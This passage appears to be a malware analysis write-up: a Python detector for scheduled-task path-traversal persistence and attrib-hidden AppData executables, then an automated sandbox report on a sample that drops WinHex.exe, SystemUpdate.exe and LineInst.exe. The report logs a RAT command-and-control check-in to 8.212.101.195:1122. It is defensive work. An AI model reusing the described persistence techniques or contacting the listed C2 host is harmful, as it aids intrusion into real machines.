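    for ev in events:
        if ev["EventID"] == 11:
            target = ev["TargetFilename"]
            if target.lower().endswith((".exe", ".dll")) and in_appdata_root(target):
                findings.append(("exe_created_in_appdata_root", resolve_path(target), ev["Image"]))
            continue
        if ev["EventID"] != 1:
            continue
        cmd, parent = ev["CommandLine"], ev.get("ParentImage", "")
        reg = parse_task_registration(cmd)
        if reg:
            raw, action, name, level = reg
            if ".." in raw.replace("/", "\\").split("\\"):
                # 'Roaming\..\X.exe' looks like %APPDATA% but resolves one directory up
                findings.append(("task_action_uses_path_traversal", action, name))
            if "\\users\\" in action.lower() and level.lower() == "highest":
                findings.append(("elevated_task_runs_user_writable_binary", action, name))
            if name.lower().startswith("microsoft") and "\\users\\" in parent.lower():
                findings.append(("microsoft_lookalike_task_from_user_profile", name, parent))
        for path in parse_attrib_hides(cmd):
            if path.lower().endswith(".exe") and "\\users\\" in path.lower():
                findings.append(("executable_hidden_with_attrib", path, ev["Image"]))
    return findings


if __name__ == "__main__":
    for rule, subject, detail in analyze(EVENTS):
        print(f"{rule:42} {subject}  <- {detail}")
```

resolve_path is the point of the example: the tasks' action string C:\Users\user\AppData\Roaming\../LineInst.exe resolves to C:\Users\user\AppData\LineInst.exe, the same files the attrib commands hide, so a hunt that matches the literal Roaming\ substring or compares the unresolved string against a file listing misses the binary. On a live host the same checks apply to the Execute field of (Get-ScheduledTask).Actions and to the Attributes of files in the profile's AppData root; the benign VendorAgent registration produces no finding because its action is not user-writable and its run level is the default.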


AV Detection

Source: T1#U52a9#U624b1.0.1.exe; Virustotal: Detection: 14%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
The BCrypt hashing functions below are in SetupHost.exe, the Windows upgrade host that LineInst.exe launched from C:\$Windows.~WS\Sources (see the process tree), not in the submitted sample.
Source: C:\$Windows.~WS\Sources\SetupHost.exe; Code function: 13_2_0052C0E8 __allrem,SetLastError,BCryptHashData,GetLastError,SetLastError,13_2_0052C0E8
Source: C:\$Windows.~WS\Sources\SetupHost.exe; Code function: 13_2_0051C3FB BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,13_2_0051C3FB
Source: C:\$Windows.~WS\Sources\SetupHost.exe; Code function: 13_2_0051C3BE BCryptFinishHash,BCryptDestroyHash,LocalFree,13_2_0051C3BE
Source: C:\$Windows.~WS\Sources\SetupHost.exe; Code function: 13_2_0051C464 BCryptGetProperty,LocalAlloc,13_2_0051C464
Source: C:\$Windows.~WS\Sources\SetupHost.exe; Code function: 13_2_0051C4D7 BCryptCreateHash,13_2_0051C4D7
Source: C:\$Windows.~WS\Sources\SetupHost.exe; Code function: 13_2_00528A9A GetFileSizeEx,GetLastError,GetLastError,GetLastError,GetLastError,BCryptHashData,memcpy,GetLastError,GetLastError,BCryptDestroyHash,LocalFree,13_2_00528A9A
Source: C:\$Windows.~WS\Sources\SetupHost.exe; Code function: 13_2_00523F26 BCryptOpenAlgorithmProvider,BCryptGetProperty,GetProcessHeap,HeapAlloc,BCryptCreateHash,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,RtlNtStatusToDosError,SetLastError,13_2_00523F26
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Form action: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c13cb6fd407&redirect_uri=https%3A%2F%2Fsupport.microsoft.com%2Fsignin-oidc&response_type=code%20id_token&scope=openid%20profile%20offline_access&response_mode=form_post&nonce=638710728445268300.MWViZDllNTYtN2RlYy00YmIwLTlkMDYtNmRkZmZjMTZjMDVhOTljNGQ3ZDItYWVmOS00MTdiLTk3OTgtZTU1ZWM4ZTJjZDU5&prompt=none&nopa=2&state=CfDJ8C0ohqf0LPdLoRrMGwogAww3w_ArYnAktjChoLvpylRtQBzDFmbj0GP9oLu3BgsJz_XZaw-IAWKK0mIdbF2l7lIf_FEpybZ2HjEAbeeCxcqaLpr29R3Fh9Fi41r87lNM4oid3W3COo3U2EUI4ExH4iuPH8rWTXSx4wfOxfu6AITKsbEV4O0vuQUxYPi_7SE8pBB5OFOhdNyhj478IW-ANfoDZRuysfCGt6o5o1VxJGKQHmg8AJnb7bk-szT8Ao1IZ3P6ja4k6qyK55uRO0PCwhqy5CkYnoy2HQPlpjCUid8ubgzUTCTlu5MstlHq7ibWw2y2B_dpWbs1jAKUbLBW1A0PY8EJQM9_-bCTi9hGakzy&x-client-SKU=ID_NET6_0&x-client-ver=8.1.2.0&sso_reload=true microsoft microsoftonline
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Form action: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c13cb6fd407&redirect_uri=https%3A%2F%2Fsupport.microsoft.com%2Fsignin-oidc&response_type=code%20id_token&scope=openid%20profile%20offline_access&response_mode=form_post&nonce=638710728467950389.MmI1YzI2MmMtNmNhYy00YzNiLWExYjQtMTUwODU1NzQyMDlmN2FkNGRhYzEtMGQ2Ni00NWI1LWI4NDUtOGE4NzkyMmUyYjgx&prompt=none&nopa=2&state=CfDJ8C0ohqf0LPdLoRrMGwogAwyby7nG9p55ejrObUjVD7GtHI5mYbaqlaefNruZUqpCaBQT2ydmyhbYappDaUsCNx6vn31ssI7m6NaSBXBJH2ntX7WS4nA3TCwR8CMmBujiewIbarpYvRvw59kyYffytm5k_1YC3jKtuvmcQ2OkJk-AbBuhJGJ1XaAD6ILKvMf-QCRjD75TOyKkssCGVK_jhlNIiRRdaY6p4UXa8iytajhcnmKlK9N37wfLwcQPrT6i-Ab-x7Ghi22nBcBhCt2OPYua3ZLt-D-ewg4AsD2-G0M809Rv3stVgeuhqid4xd8MeqUY0ZZJU01EykKtNTYCxIqziiiN2-3vMQz4mY-KVhGw&x-client-SKU=ID_NET6_0&x-client-ver=8.1.2.0&sso_reload=true microsoft microsoftonline
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Form action: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c13cb6fd407&redirect_uri=https%3A%2F%2Fsupport.microsoft.com%2Fsignin-oidc&response_type=code%20id_token&scope=openid%20profile%20offline_access&response_mode=form_post&nonce=638710728462259409.NmI0NzhkNWQtOGMzYi00MjIxLTkxZjAtNWMzOTQ2ZDJhMGM2OTIxM2FlODYtNjU2NS00YjAxLThmZTAtMjBiNzg0NjNmMDI2&prompt=none&nopa=2&state=CfDJ8C0ohqf0LPdLoRrMGwogAwza_38Zcdlsqx3HuMIrcJn2UQDH93LLc0JmPkLh2kaG884JLU3vJ_0feNhoFLTmEcvTDAOFiasdPSOU03KFfeZwFJ9DayET5AW2XTsTwxgDyLhhlMQYQcfx68lKHC1a9mTMBOmwAqATgtQC3qh5ZAZpfgWqwMmRzrTY-4BhcJz3NGR99dbSlL-WzxWWUYH6akweJIkLJu4rnwh2eoU3NkchK7yx1EBjwpUyIfovIkL0S5pZ1WLYymbS66N9NhEiMV3sIBsZ4e1IH6a02A4Enrfb6riUZWxI1HnWp0JxuFpWtaeOHuumcPlHc6D9wFjSFH1u8a_j8bR00v0FbXwkxX5j&x-client-SKU=ID_NET6_0&x-client-ver=8.1.2.0&sso_reload=true microsoft microsoftonline
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Number of links: 0
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Base64 decoded: 1ebd9e56-7dec-4bb0-9d06-6ddffc16c05a99c4d7d2-aef9-417b-9798-e55ec8e2cd59
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Title: Redirecting does not match URL
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/windows/windows-10-specificationsHTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No <meta name="author".. found
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No <meta name="copyright".. found
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setuperr.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setupact.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setuperr.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setupact.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\Eula.rtf
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a01\_work\6\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658685678.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786622693.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1829720428.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1838603027.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SetupPrep.pdbGCTL source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1685436843.0000029E76B04000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000003.1754464189.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000000.1745430758.0000000000A71000.00000020.00000001.01000000.0000000A.sdmp, LineInst.exe, 0000000B.00000003.1748979428.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000003.1754333515.00000000038F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WdsClientApi.pdbGCTL source: wdsclientapi.dll.11.dr
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795089608.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1831179551.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830445848.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WdsClientApi.pdb source: wdsclientapi.dll.11.dr
Source: Binary string: SetupPlatform.pdb source: setupplatform.dll.11.dr
Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830735495.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SetupHost.pdbGCTL source: SetupHost.exe, 0000000D.00000000.1779120957.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: SetupPlatform.pdbGCTL source: setupplatform.dll.11.dr
Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1831564639.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SetupHost.pdb source: SetupHost.exe, SetupHost.exe, 0000000D.00000000.1779120957.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: SetupPrep.pdb source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1685436843.0000029E76B04000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, LineInst.exe, 0000000B.00000003.1754464189.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000000.1745430758.0000000000A71000.00000020.00000001.01000000.0000000A.sdmp, LineInst.exe, 0000000B.00000003.1748979428.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000003.1754333515.00000000038F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795089608.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1831179551.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B5C000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAD3000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1838911809.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\WinHex.exeFile opened: z:
Source: C:\Users\user\AppData\WinHex.exeFile opened: x:
Source: C:\Users\user\AppData\WinHex.exeFile opened: v:
Source: C:\Users\user\AppData\WinHex.exeFile opened: t:
Source: C:\Users\user\AppData\WinHex.exeFile opened: r:
Source: C:\Users\user\AppData\WinHex.exeFile opened: p:
Source: C:\Users\user\AppData\WinHex.exeFile opened: n:
Source: C:\Users\user\AppData\WinHex.exeFile opened: l:
Source: C:\Users\user\AppData\WinHex.exeFile opened: j:
Source: C:\Users\user\AppData\WinHex.exeFile opened: h:
Source: C:\Users\user\AppData\WinHex.exeFile opened: f:
Source: C:\Users\user\AppData\WinHex.exeFile opened: b:
Source: C:\Users\user\AppData\WinHex.exeFile opened: y:
Source: C:\Users\user\AppData\WinHex.exeFile opened: w:
Source: C:\Users\user\AppData\WinHex.exeFile opened: u:
Source: C:\Users\user\AppData\WinHex.exeFile opened: s:
Source: C:\Users\user\AppData\WinHex.exeFile opened: q:
Source: C:\Users\user\AppData\WinHex.exeFile opened: o:
Source: C:\Users\user\AppData\WinHex.exeFile opened: m:
Source: C:\Users\user\AppData\WinHex.exeFile opened: k:
Source: C:\Users\user\AppData\WinHex.exeFile opened: i:
Source: C:\Users\user\AppData\WinHex.exeFile opened: g:
Source: C:\Users\user\AppData\WinHex.exeFile opened: e:
Source: C:\Windows\System32\svchost.exeFile opened: c:
Source: C:\Users\user\AppData\WinHex.exeFile opened: [:
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6746714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7A6746714
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6737820 FindFirstFileExW,FindClose,0_2_00007FF7A6737820
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67509B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7A67509B4
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE6714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,12_2_00007FF7C5BE6714
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BD7820 FindFirstFileExW,FindClose,12_2_00007FF7C5BD7820
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF09B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00007FF7C5BF09B4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FFD75 memset,SetLastError,GetLastError,FindFirstFileW,memset,wcsrchr,SetLastError,SetLastError,CompareStringW,CompareStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,memset,FindNextFileW,GetLastError,GetLastError,GetLastError,FindClose,GetLastError,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SetLastError,SetLastError,13_2_004FFD75
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00544EA0 FindFirstFileW,13_2_00544EA0
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657806714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,19_2_00007FF657806714
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6577F7820 FindFirstFileExW,FindClose,19_2_00007FF6577F7820
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6578109B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_00007FF6578109B4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00544D90 GetLogicalDriveStringsW,13_2_00544D90

Networking

Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49905 -> 8.212.101.195:1122
Source: global trafficTCP traffic: 192.168.2.4:49905 -> 8.212.101.195:1122
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewIP Address: 152.199.21.175 152.199.21.175
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 8.212.101.195
Source: global trafficHTTP traffic detected: GET /api/v3/ip.json?key=7D8lsDsuK7OQCqWFQDi6VqJjwaKomm62lkY5XEyw&referrer=&page=https%3A%2F%2Fwww.microsoft.com%2Fen-us%2Fwindows%2Fwindows-10-specifications&title=Check%20Windows%2010%20System%20Requirements%20%26%20Specs%20%7C%20Microsoft HTTP/1.1Host: api.company-target.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.microsoft.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: support.content.office.net
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: mem.gfx.ms
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
Source: global trafficDNS traffic detected: DNS query: api.company-target.com
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B5C000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1661029096.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B5F000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAD6000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1796414051.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 
0000000C.00000003.1801728812.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B5C000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1661029096.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1796414051.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 
0000000C.00000003.1801728812.000001F51FAD3000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1800528739.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787113599.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1661029096.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B5F000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 